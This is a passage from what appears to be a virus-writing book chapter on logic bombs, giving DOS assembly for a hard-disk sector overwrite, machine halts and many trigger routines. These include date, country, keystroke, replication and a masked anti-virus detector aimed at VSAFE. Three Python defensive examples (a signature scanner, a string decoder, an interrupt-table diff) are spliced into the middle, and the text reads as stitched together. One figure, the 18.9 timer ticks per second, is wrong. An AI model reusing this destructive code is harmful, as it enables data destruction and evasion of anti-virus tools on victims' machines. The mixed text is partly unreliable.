these techniques work perfectly well, they are in principle just the same as using assembler—and assembler is more versatile. The reader who is interested in such matters would do well to consult some of the material available on The Collection CD-ROM.[1]

On the face of it, writing destructive code is the simplest programming task in the world. When someone who doesn't know the first thing about programming tries to program, the first thing they learn is that it's easier to write a destructive program which louses something up than it is to write a properly working program. For example, if you know that Interrupt 13H is a call to the disk BIOS and it will write to the hard disk if you call it with ah=3 and dl=80H, you can write a simple destructive program,

            mov     dl,80H
            mov     ah,3
            int     13H

You needn't know how to set up the other registers to do something right. Executing this will often overwrite a sector on the hard disk with garbage.

Despite the apparent ease of writing destructive code, there is an art to it which one should not be unaware of. While the above routine is almost guaranteed to cause some damage when properly deployed, it would be highly unlikely to stop a nuclear attack even if it did find its way into the right computer. It might cause some damage, but probably not the right damage at the right time.

To write effective destructive code, one must pay close attention to (1) the trigger mechanism and (2) the bomb itself. Essentially, the trigger decides when destructive activity will take place and the bomb determines what destructive activity will happen. We will discuss each aspect of destructive code writing in this chapter.

[1] Consult the Resources section in this book for more information.

Trigger Mechanisms

Triggers can cause the bomb to detonate under a wide variety of circumstances. If you can express any set of conditions logically and if a piece of software can sense these conditions, then they can be coded into a trigger mechanism.
For example, a trigger routine could activate when the PC's date reads June 13, 1996 if your computer has an Award BIOS and a SCSI hard disk, and you type the word "garbage". On the other hand, it would be rather difficult to make it activate at sunrise on the next cloudy day, because that can't be detected by software. This is not an entirely trivial observation—chemical bombs with specialized hardware are not subject to such limitations.

For the most part, logic bombs incorporated into computer viruses use fairly simple trigger routines. For example, they activate on a certain date, after a certain number of executions, or after a certain time in memory, or at random. There is no reason this simplicity is necessary, though. Trigger routines can be very complex. In fact, the Virus Creation Lab allows the user to build much more complex triggers using a pull-down menu scheme.

Typically, a trigger might simply be a routine which returns with the z flag set or reset. Such a trigger can be used something like this:

    LOGIC_BOMB:
            call    TRIGGER         ;detonate bomb?
            jnz     DONT_DETONATE   ;nope
            call    BOMB            ;yes
    DONT_DETONATE:

Where this code is put may depend on the trigger itself. For example, if the trigger is set to detonate after a program has been in memory for a certain length of time, it would make sense to make it part of the software timer interrupt (INT 1CH). If it triggers on a certain set of keystrokes, it might go in the hardware keyboard interrupt (INT 9), or if it triggers when a certain BIOS is detected, it could be buried within the execution path of an application program.

Let's take a look at some of the basic tools a trigger routine can use to do its job:

The Counter Trigger

A trigger can occur when a counter reaches a certain value. Typically, the counter is just a memory location that is initialized to zero at some time, and then incremented in another routine:

    COUNTER DW      0

(Alternatively, it could be set to some fixed value and decremented to zero.)
COUNTER can be used by the trigger routine like this:

    TRIGGER:
            cmp     cs:[COUNTER],TRIG_VAL
            ret

When [COUNTER]=TRIG_VAL, TRIGGER returns with z set and the BOMB gets called.

Keystroke Counter

The counter might be incremented in a variety of ways, depending on the conditions for the trigger. For example, if the trigger should go off after 10,000 keystrokes, one might install an Interrupt 9 handler like this:

    INT_9:
            push    ax
            in      al,60H
            test    al,80H
            pop     ax
            jnz     I9EX
            inc     cs:[COUNTER]
            call    TRIGGER
            jnz     I9EX
            call    BOMB
    I9EX:   jmp     DWORD PTR cs:[OLD_INT9]

This increments COUNTER with every keystroke, ignoring the scan codes which the keyboard puts out when a key goes up, and the extended multiple scan codes produced by some keys. After the logic bomb is done, it passes control to the original int 9 handler to process the keystroke.

Time Trigger

On the other hand, triggering after a certain period of time can be accomplished with something as simple as this:

    INT_1C:
            inc     cs:[COUNTER]
            call    TRIGGER
            jnz     I1CEX
            call    BOMB
    I1CEX:  jmp     DWORD PTR cs:[OLD_INT1C]

Since INT_1C gets called 18.9 times per second, [COUNTER] will reach the desired value after the appropriate time lapse. One could likewise code a counter-based trigger to go off after a fixed number of disk reads (hook int 13H, Function 2), after executing so many programs (hook Interrupt 21H, Function 4BH), or changing video modes so many times (hook int 10H, Function 0), or after loading Windows seven times (hook int 2FH, Function 1605H), etc., etc.

Replication Trigger

One of the more popular triggers is to launch a bomb after a certain number of replications of a virus. There are a number of ways to do this. For example, the routine

            push    [COUNTER]
            mov     [COUNTER],0     ;reset counter
            call    REPLICATE       ;and replicate
            pop     [COUNTER]       ;restore original counter
            inc     [COUNTER]       ;increment it
            call    TRIGGER

will make TRIG_VAL copies of itself and then trigger. Each copy will have a fresh counter set to zero.
The Lehigh virus, which was one of the first viruses to receive a lot of publicity in the late 80's, used this kind of a mechanism.

One could, of course, code this replication trigger a little differently to get different results. For example,

            call    TRIGGER
            jnz     GOON            ;increment counter if no trigger
            call    BOMB            ;else explode
            mov     [COUNTER],0     ;start over after damage
    GOON:   inc     [COUNTER]       ;increment counter
            call    REPLICATE       ;make new copy w/ new counter
            dec     [COUNTER]       ;restore original value

will count the generations of a virus. The first TRIG_VAL-1 generations will never cause damage, but the TRIG_VAL'th generation will activate the BOMB. Likewise, one could create a finite number of bomb detonations with the routine

            inc     [COUNTER]       ;increment counter
            call    TRIGGER
            jnz     GO_REP          ;replicate if not triggered
            call    BOMB            ;else explode
            jmp     $               ;and halt—do not replicate!
    GO_REP: call    REPLICATE

The first generation will make TRIG_VAL copies of itself and then trigger. One of the TRIG_VAL second-generation copies will make TRIG_VAL-1 copies of itself (because it starts out with COUNTER = 1) and then detonate. This arrangement gives a total of 2^TRIG_VAL bombs exploding. This is a nice way to handle a virus dedicated to attacking a specific target because it doesn't just keep replicating and causing damage potentially ad infinitum. It just does its job and goes away.

The System-Parameter Trigger

There are a wide variety of system parameters which can be read by software and used in a trigger routine. By far the most common among virus writers is the system date, but this barely scratches the surface of what can be done. Let's look at some easily accessible system parameters to get a feel for the possibilities . . . .

Date

To get the current date, simply call int 21H with ah=2AH. On return, cx is the year, dh is the month, and dl is the day of the month, while al is the day of the week, 0 to 6.
Thus, to trigger on any Friday the 13th, a trigger might look like this:

    TRIGGER:
            mov     ah,2AH
            int     21H             ;get date info
            cmp     al,5            ;check day of week
            jnz     TEX
            cmp     dl,13           ;check day of month
    TEX:    ret

Pretty easy! No wonder so many viruses use this trigger.

Time

DOS function 2CH reports the current system time. Typically a virus will trigger after a certain time, or during a certain range of time. For example, to trigger between four and five PM, the trigger could look like this:

    TRIGGER:
            mov     ah,2CH
            int     21H
            cmp     ch,4+12         ;check hour
            ret                     ;return z if 4:XX pm

Disk Free Space

DOS function 36H reports the amount of free space on a disk. A trigger could only activate when a disk is 127/128 or more full, for example:

    TRIGGER:
            mov     ah,36H
            mov     dl,3
            int     21H
            mov     ax,dx           ;dx=total clusters on disk
            sub     ax,bx           ;ax=total free clusters
            mov     cl,7
            shr     dx,cl           ;dx=dx/128
            cmp     ax,dx           ;if free<al/128 then trigger
            jg      NOTR
            xor     al,al
    NOTR:   ret

Country

One could write a virus to trigger only when it finds a certain country code in effect on a computer by using DOS function 38H. The country codes used by DOS are the same as those used by the phone company for country access codes. Thus, one could cause a virus to trigger only in Germany and nowhere else:

    TRIGGER:
            mov     ah,38H
            mov     al,0            ;get country info
            mov     dx,OFFSET BUF   ;buffer for country info
            int     21H
            cmp     bx,49           ;is it Germany?
            ret

This trigger and a date trigger (December 7) are used by the Pearl Harbor virus distributed with the Virus Creation Lab. It only gets nasty in Japan.

Video Mode

By using the BIOS video services, a virus could trigger only when the video is in a certain desired mode, or a certain range of modes:

    TRIGGER:
            mov     ah,0FH
            int     10H             ;get video mode
            and     al,11111100B    ;mode 0 to 3?
            ret

This might be useful if the bomb includes a mode-dependent graphic, such as the Ambulance virus, which sends an ambulance across your screen from time to time, and which requires a normal text mode.
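The date and time triggers above, and the three-instruction sector write at the start of the chapter, have a recognizable shape in machine code, which is what a signature writer of the period would key on. The following is an added example of that detection logic, not code from the book: it walks raw 16-bit real-mode code looking for INT 13H reached with AH=3 (a BIOS sector write) and for INT 21H with AH=2AH or 2CH (date or time query) followed by compares against constants, and decodes the constants the way an analyst would read them (day of week 5 = Friday under the DOS convention 0 = Sunday, day of month 13, hour 16). The opcode encodings are standard x86 (mov ah,imm8 = B4 ib, mov dl,imm8 = B2 ib, int = CD ib, cmp al,imm8 = 3C ib, cmp dl/ch/dh,imm8 = 80 FA/FD/FE ib); the window sizes and the SAMPLE buffer are constructed for this example.

```python
"""Heuristic static scan for the sector-write and date/time-conditional idioms.
Added defensive example; the SAMPLE bytes are hand-assembled from the chapter's
snippets plus two benign fragments, not taken from any real program."""
from dataclasses import dataclass, field

MOV_AH_IMM8 = 0xB4
MOV_DL_IMM8 = 0xB2
INT_IMM8 = 0xCD
CMP_AL_IMM8 = 0x3C
RET = 0xC3
# cmp r8,imm8 is 80 /7; the ModRM byte names the register being compared.
CMP_R8_IMM8 = {0xFA: "dl", 0xFD: "ch", 0xFE: "dh"}

LOOKBACK = 16    # bytes searched backwards for the mov that loads AH (assumed window)
LOOKAHEAD = 16   # bytes searched forwards for compares on the returned registers
WEEKDAYS = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]


@dataclass
class Hit:
    offset: int          # offset of the INT instruction
    kind: str            # raw-disk-write | date-conditional | time-conditional
    compares: list = field(default_factory=list)   # (register, immediate) pairs
    note: str = ""


def last_mov_ah(code, end):
    """Immediate of the nearest preceding 'mov ah,imm8', or None. Heuristic: a
    B4 byte that is really part of another instruction's operand would fool it."""
    for i in range(end - 2, max(-1, end - LOOKBACK - 1), -1):
        if code[i] == MOV_AH_IMM8:
            return code[i + 1]
    return None


def loads_dl(code, end, value):
    """True if 'mov dl,value' appears within LOOKBACK bytes before end."""
    start = max(0, end - LOOKBACK)
    return any(code[i] == MOV_DL_IMM8 and code[i + 1] == value
               for i in range(start, end - 1))


def compares_after(code, start):
    """Collect cmp al/dl/ch/dh,imm8 after start, stopping at the first ret."""
    found = []
    i, end = start, min(len(code), start + LOOKAHEAD)
    while i < end:
        b = code[i]
        if b == RET:
            break
        if b == CMP_AL_IMM8 and i + 1 < end:
            found.append(("al", code[i + 1]))
            i += 2
        elif b == 0x80 and i + 2 < end and code[i + 1] in CMP_R8_IMM8:
            found.append((CMP_R8_IMM8[code[i + 1]], code[i + 2]))
            i += 3
        else:
            i += 1
    return found


def scan(code):
    """Return a Hit for every INT that matches one of the two idioms."""
    hits = []
    for i in range(len(code) - 1):
        if code[i] != INT_IMM8:
            continue
        vector, ah = code[i + 1], last_mov_ah(code, i)
        if vector == 0x13 and ah == 0x03:
            drive = "drive 80h (first hard disk)" if loads_dl(code, i, 0x80) else "drive not resolved"
            hits.append(Hit(i, "raw-disk-write", note="INT 13H AH=03H, " + drive))
        elif vector == 0x21 and ah in (0x2A, 0x2C):
            kind = "date-conditional" if ah == 0x2A else "time-conditional"
            cmps = compares_after(code, i + 2)
            if cmps:   # a bare query is normal; a query feeding a compare is the trigger shape
                notes = []
                for reg, imm in cmps:
                    if ah == 0x2A and reg == "al" and imm < 7:
                        notes.append("weekday %d = %s" % (imm, WEEKDAYS[imm]))
                    elif ah == 0x2A and reg == "dl":
                        notes.append("day of month %d" % imm)
                    elif ah == 0x2C and reg == "ch":
                        notes.append("hour %d" % imm)
                hits.append(Hit(i, kind, cmps, "; ".join(notes)))
    return hits


# Constructed sample: two benign fragments, then the chapter's sector write,
# Friday-the-13th trigger and 4 PM trigger, hand-assembled.
SAMPLE = bytes([
    0xB4, 0x09, 0xCD, 0x21,                          # 00: mov ah,9 / int 21H (print string: benign)
    0xB4, 0x02, 0xB2, 0x80, 0xCD, 0x13,              # 04: mov ah,2 / mov dl,80H / int 13H (sector read: not flagged)
    0xB2, 0x80, 0xB4, 0x03, 0xCD, 0x13,              # 0A: mov dl,80H / mov ah,3 / int 13H (sector write)
    0xB4, 0x2A, 0xCD, 0x21,                          # 10: mov ah,2AH / int 21H (get date)
    0x3C, 0x05, 0x75, 0x03, 0x80, 0xFA, 0x0D, 0xC3,  # 14: cmp al,5 / jnz +3 / cmp dl,13 / ret
    0xB4, 0x2C, 0xCD, 0x21,                          # 1C: mov ah,2CH / int 21H (get time)
    0x80, 0xFD, 0x10, 0xC3,                          # 20: cmp ch,16 / ret
])

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print("%04X %-17s %s %s" % (h.offset, h.kind, h.compares, h.note))
```

Because the scan is byte-oriented rather than a true disassembly, it trades false positives for simplicity; the two benign fragments in SAMPLE (a print-string call and a sector read) show the AH check doing its job, and a real tool would add a length decoder so that immediates are never mistaken for opcodes.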
Many other triggers which utilize interrupt calls to fetch system information are possible. For example, one could trigger depending on the number and type of disk drives, on the memory size or free memory, on the DOS version number, on the number of serial ports, on whether a network was installed, or whether DPMI or Windows was active, and on and on. Yet one need not rely only on interrupt service routines to gather information and make decisions.

BIOS ROM Version

A logic bomb could trigger when it finds a particular BIOS (or when it does not find a particular BIOS). To identify a BIOS, a 16-byte signature from the ROM, located starting at F000:0000 in memory is usually sufficient. The BIOS date stamp at F000:FFF5 might also prove useful. The routine

    TRIGGER:
            push    es
            mov     ax,0F000H       ;BIOS date at es:di
            mov     es,ax
            mov     di,0FFF5H
            mov     si,OFFSET TRIG_DATE ;date to compare with
            mov     cx,8
            repz    cmpsb
            pop     es
            jz      TNZ             ;same, don't trigger
            xor     al,al           ;else set Z
            ret
    TNZ:    mov     al,1
            or      al,al
            ret

    TRIG_DATE DB    '12/12/91'

triggers if the BIOS date is anything but 12/12/91. Such a trigger might be useful in a virus that is benign on your own computer, but malicious on anyone else's.

Keyboard Status

The byte at 0000:0417H contains the keyboard status. If bits 4 through 7 are set, then Scroll Lock, Num Lock, Caps Lock and Insert are active, respectively. A trigger might only activate when Num Lock is on, etc., by checking this bit.

Anti-Virus Search

Obviously there are plenty of other memory variables which might be used to trigger a logic bomb. A virus might even search memory for an already-installed copy of itself, or a popular anti-virus program and trigger if it's installed. For example, the following routine scans memory for the binary strings at SCAN_STRINGS, and activates when any one of them is found:

    SCAN_RAM:
            push    es
            mov     si,OFFSET SCAN_STRINGS
    SRLP:   lodsb                   ;get scan string length
            or      al,al           ;is it 0?
            jz      SREXNZ          ;yes-no match, end of scan strings
            xor     ah,ah
            push    ax              ;save string length
            lodsw
            mov     dx,ax           ;put string offset in dx (loads di)
            pop     ax
            mov     bx,40H          ;start scan at seg 40H (bx loads es)
            push    si
    SRLP2:  pop     si              ;inner loop, look for string in seg
            push    si              ;set up si
            mov     di,dx           ;and di
            mov     cx,ax           ;scan string size
            inc     bx              ;increment segment to scan
            mov     es,bx           ;set segment
            push    ax              ;save string size temporarily
    SRLP3:  lodsb                   ;get a byte from string below
            xor     al,0AAH         ;xor to get true value to compare
            inc     di
            cmp     al,es:[di-1]    ;compare against byte in ram
            loopz   SRLP3           ;loop 'till done or no compare
            pop     ax
            jz      SREX1           ;have a match-string found! return Z
            cmp     bx,0F000H       ;done with this string's scan?
            jnz     SRLP2           ;nope, go do another segment
            pop     si              ;scan done, clean stack
            add     si,ax
            jmp     SRLP            ;and go for next string
    SREX1:  xor     al,al           ;match found - set z and exit
            pop     si
            pop     es
            ret
    SREXNZ: pop     es
            inc     al              ;return with nz - no matches
            ret

    ;The scan string data structure looks like this:
    ;  DB LENGTH  = A single byte string length
    ;  DW OFFSET  = Offset where string is located in seg
    ;  DB X,X,X   = Scan string of length LENGTH,
    ;               xored with 0AAH
    ;
    ;These are used back to back, and when a string of length 0 is
    ;encountered, SCAN_RAM stops. The scan string is XORed with AA so
    ;this will never detect itself.

    SCAN_STRINGS:
            DB      14              ;length
            DW      1082H           ;offset
            DB      0E9H,0F9H,0EBH,0FCH,84H,0EFH            ;scan string
            DB      0F2H,0EFH,0AAH,0AAH,85H,0FCH,0F9H,0AAH  ;for MS-DOS 6.20 VSAFE
            ;Note this is just a name used by VSAFE, not the best string
            DB      0               ;next record, 0 = no more strings

An alternative might be to scan video memory for the display of a certain word or phrase.

Finally, one might write a trigger which directly tests hardware to determine when to activate.

Processor Check

Because 8088 processors handle the instruction push sp differently from 80286 and higher processors, one can use it to determine which processor a program is run on.
The routine

    TRIGGER:
            push    sp
            pop     bx
            mov     ax,sp
            cmp     ax,bx
            ret

triggers (returns with z set) only if the processor is an 80286 or above.

Null Trigger

Finally, we come to the null trigger, which is really no trigger at all. Simply put, the mere placement of a logic bomb can serve as trigger enough. For example, one might completely replace DOS's critical error handler, int 24H, with a logic bomb. The next time that handler gets called (for example, when you try to write to a write-protected diskette) the logic bomb will be called. In such cases there is really no trigger at all—just the code equivalent of a land mine waiting for the processor to come along and step on it.

Logic Bombs

Next, we must discuss the logic bombs themselves. What can malevolent programs do when they trigger? The possibilities are at least as endless as the ways in which they can trigger. Here we will discuss some possibilities to give you an idea of what can be done.

Brute Force Attack

The simplest logic bombs carry out some obvious annoying or destructive activity on a computer. This can range from making noise or goofing with the display to formatting the hard disk. Here are some simple examples:

Halt the Machine

This is the easiest thing a logic bomb can possibly do:

    BOMB:   jmp     $

will work quite fine. You might stop hardware interrupts too, to force the user to press the reset button:

    BOMB:   cli
            jmp     $
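The SCAN_STRINGS table in the Anti-Virus Search section is stored masked so that the scanner never matches its own data, which also means a plain string search over a sample will not reveal what it hunts for in memory. The following is an added example for the analyst's side, not code from the book: a parser for that record layout (length byte, little-endian offset word, LENGTH masked bytes, repeated until a zero length) that unmasks each record. The first record is the table printed in the chapter, byte for byte; the second record and the file name in it are constructed to show a multi-record table.

```python
"""Decoder for the XOR-0AAH masked scan-string table used by SCAN_RAM.
Added example; the second record below is constructed, not from the book."""

MASK = 0xAA


def mask(plain):
    """Apply the chapter's XOR mask (used here only to build the constructed record)."""
    return bytes(b ^ MASK for b in plain)


def parse_scan_strings(table):
    """Parse the table into [(offset, unmasked_bytes), ...], stopping at the 0 length."""
    records, pos = [], 0
    while True:
        if pos >= len(table):
            raise ValueError("table has no terminating zero-length record")
        length = table[pos]
        if length == 0:
            return records
        if pos + 3 + length > len(table):
            raise ValueError("truncated record at offset %d" % pos)
        offset = int.from_bytes(table[pos + 1:pos + 3], "little")
        masked = table[pos + 3:pos + 3 + length]
        records.append((offset, mask(masked)))   # XOR with the same key is its own inverse
        pos += 3 + length


def preview(data):
    """Printable rendering with '.' for non-ASCII bytes."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


# Table from the chapter, byte for byte, followed by one constructed record.
SCAN_STRINGS = bytes([
    14, 0x82, 0x10,                                  # DB 14 / DW 1082H
    0xE9, 0xF9, 0xEB, 0xFC, 0x84, 0xEF,              # masked scan string
    0xF2, 0xEF, 0xAA, 0xAA, 0x85, 0xFC, 0xF9, 0xAA,
]) + bytes([11, 0x00, 0x01]) + mask(b"EXAMPLE.COM") + bytes([0])   # constructed record + terminator


def decode_sample():
    return parse_scan_strings(SCAN_STRINGS)


if __name__ == "__main__":
    for offset, plain in decode_sample():
        print("offset %04X: %s" % (offset, preview(plain)))
```

Running it shows the chapter's record unmasking to "CSAV.EXE../VS." at offset 1082H, which is the kind of string an analyst records as the sample's target rather than the masked bytes themselves.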
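Every placement the chapter suggests, the INT 9 and INT 1CH hooks that host the keystroke and timer counters and the null trigger that replaces INT 24H outright, shows up as a changed entry in the interrupt vector table at 0000:0000 (256 entries, each a little-endian offset word followed by a segment word). The following is an added defensive example, not code from the book: a DOS-era integrity check that snapshots the table, diffs a later snapshot against it, and flags watched vectors that now point into conventional RAM, where a resident program would live. The two IVT images are constructed sample data; the baseline targets are plausible ROM and DOS addresses, the 9F80H segment in the second image stands for a resident hook, and none of the values were measured on a real machine.

```python
"""Interrupt-vector-table baseline diff. Added example; the snapshots are constructed."""
import struct

IVT_ENTRIES = 256
IVT_SIZE = IVT_ENTRIES * 4

# Vectors the chapter names as hook points or replacement targets.
WATCHED = {
    0x09: "keyboard hardware interrupt",
    0x10: "BIOS video services",
    0x13: "BIOS disk services",
    0x1C: "timer tick (user hook)",
    0x21: "DOS services",
    0x24: "DOS critical error handler",
    0x2F: "DOS multiplex",
}

CONVENTIONAL_TOP = 0xA0000  # first linear address above the 640 KB of conventional RAM


def build_ivt(entries):
    """Build a 1024-byte IVT image from {vector: (offset, segment)}; the rest is 0000:0000.
    Used here only to construct the sample snapshots."""
    image = bytearray(IVT_SIZE)
    for vector, (offset, segment) in entries.items():
        struct.pack_into("<HH", image, vector * 4, offset, segment)
    return bytes(image)


def parse_ivt(image):
    """Decode an IVT image into {vector: (offset, segment)}."""
    if len(image) != IVT_SIZE:
        raise ValueError("IVT image must be exactly %d bytes" % IVT_SIZE)
    return {v: struct.unpack_from("<HH", image, v * 4) for v in range(IVT_ENTRIES)}


def linear_address(offset, segment):
    return segment * 16 + offset


def region(offset, segment):
    """Coarse classification of where a vector points."""
    if segment >= 0xF000:
        return "ROM BIOS"
    if linear_address(offset, segment) >= CONVENTIONAL_TOP:
        return "adapter/ROM area"
    return "conventional RAM"


def diff_ivt(baseline_image, current_image):
    """One finding per vector whose target changed between the snapshots.
    Watched vectors that now point into conventional RAM are marked suspicious."""
    before, after = parse_ivt(baseline_image), parse_ivt(current_image)
    findings = []
    for vector in range(IVT_ENTRIES):
        if before[vector] == after[vector]:
            continue
        off, seg = after[vector]
        findings.append({
            "vector": vector,
            "old": "%04X:%04X" % (before[vector][1], before[vector][0]),
            "new": "%04X:%04X" % (seg, off),
            "region": region(off, seg),
            "watched": WATCHED.get(vector),
            "suspicious": vector in WATCHED and region(off, seg) == "conventional RAM",
        })
    return findings


# Constructed snapshots: a clean table, then the same table after a resident
# program has hooked INT 9 and INT 1CH (the chapter's keystroke and timer hook
# points) and also installed a private vector at INT 60H.
BASELINE = build_ivt({
    0x09: (0xE987, 0xF000),   # keyboard handler in ROM
    0x10: (0xF065, 0xF000),   # video in ROM
    0x13: (0xEC59, 0xF000),   # disk in ROM
    0x1C: (0xFF53, 0xF000),   # default timer tick: an IRET in ROM
    0x21: (0x109E, 0x0116),   # DOS kernel, low conventional memory
    0x24: (0x0D48, 0x0116),
    0x2F: (0x1078, 0x0116),
})
AFTER = build_ivt({
    0x09: (0x0103, 0x9F80),   # now points at a resident hook near the top of 640 KB
    0x10: (0xF065, 0xF000),
    0x13: (0xEC59, 0xF000),
    0x1C: (0x0150, 0x9F80),   # likewise
    0x21: (0x109E, 0x0116),
    0x24: (0x0D48, 0x0116),
    0x2F: (0x1078, 0x0116),
    0x60: (0x0010, 0x9F80),   # private vector: changed, but not a watched hook point
})


def suspicious_vectors(baseline_image=BASELINE, current_image=AFTER):
    """Vectors an operator would be alerted about, in ascending order."""
    return [f["vector"] for f in diff_ivt(baseline_image, current_image) if f["suspicious"]]


if __name__ == "__main__":
    for f in diff_ivt(BASELINE, AFTER):
        flag = "SUSPICIOUS" if f["suspicious"] else "changed"
        print("INT %02Xh %-10s %s -> %s (%s%s)" % (
            f["vector"], flag, f["old"], f["new"], f["region"],
            ", " + f["watched"] if f["watched"] else ""))
```

The check is deliberately coarse: a legitimate TSR (a mouse driver, a keyboard enhancer) hooks the same vectors, so the finding is a prompt to look at what lives at the new address, not a verdict. The region test exists because a vector that moves within ROM or between DOS kernel addresses is far less interesting than one that suddenly lands in a program's own memory.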